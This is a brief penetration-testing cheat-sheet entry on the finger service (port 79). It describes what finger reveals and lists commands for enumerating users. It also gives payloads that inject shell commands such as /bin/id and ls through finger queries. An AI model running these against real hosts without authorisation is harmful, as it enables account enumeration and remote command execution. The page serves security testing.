FINGER 79

Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.

PORT STATE SERVICE

79/tcp open finger

  • User enumeration

finger @<IP> finger <USER>@<IP>

  • Command execution

finger "|/bin/id@<IP>" finger "|/bin/ls -a /<IP>"

Last updated